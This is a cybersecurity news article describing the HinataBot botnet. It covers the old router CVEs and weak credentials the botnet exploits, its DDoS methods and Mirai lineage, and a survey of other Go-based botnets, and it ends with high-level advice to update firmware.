Contents:
In January, a Go-based botnet named HinataBot (named after the character from the popular anime series Naruto) was discovered exploiting old vulnerabilities and weak credentials in HTTP and SSH honeypots.
HinataBot Overview
According to Akamai’s SIRT team, the botnet exploited arbitrary code execution flaws in the miniigd SOAP service in Realtek SDK (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215) to spread. The botnet also exploited exposed Hadoop YARN servers with weak credentials.
During DDoS attacks, HinataBot uses HTTP, UDP, TCP, and ICMP protocols to send traffic. The authors have, however, narrowed down the attacks to only HTTP and UDP in the latest version.
Furthermore, HinataBot’s threat actors distributed Mirai binaries before developing their own botnet in mid-January.
According to researchers, the new botnet is a Golang version of Mirai that follows some of the latter’s attack methods and processes. The way HinataBot communicates and parses commands to launch attacks is one of these similarities.
HinataBot is still in development, so it is difficult to predict its future attack scope.
In addition to the ever-growing list of Go-based threats, HinataBot uses older and proven techniques, such as Mirai’s, as a means to upgrade the botnet’s evasion techniques. Organizations are advised to update firmware of affected products while HinataBot is continuously monitored. They can also utilize the IOCs to gain a better understanding of the APTs’ current attack patterns.
The Rise of Go-based Botnets
Cybercriminals are increasingly interested in Golang because of its high performance, ease of multithreading, and cross-compilation capabilities. As recent as last week, the GoBruteforcer botnet was spotted scanning and infecting popular web servers to launch targeted attacks. It goes after web servers running phpMyAdmin, MySQL, FTP, and Postgres.
Another multi-purpose Go-based botnet known as Chaos became a matter of security concern as it expanded its cryptomining and DDoS attacks to target Windows and Linux devices across Europe.
In another instance, a new GoTrim botnet was spotted scanning and brute-forcing websites using the WordPress CMS to launch DDoS attacks.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, and YouTube for more cybersecurity news and topics.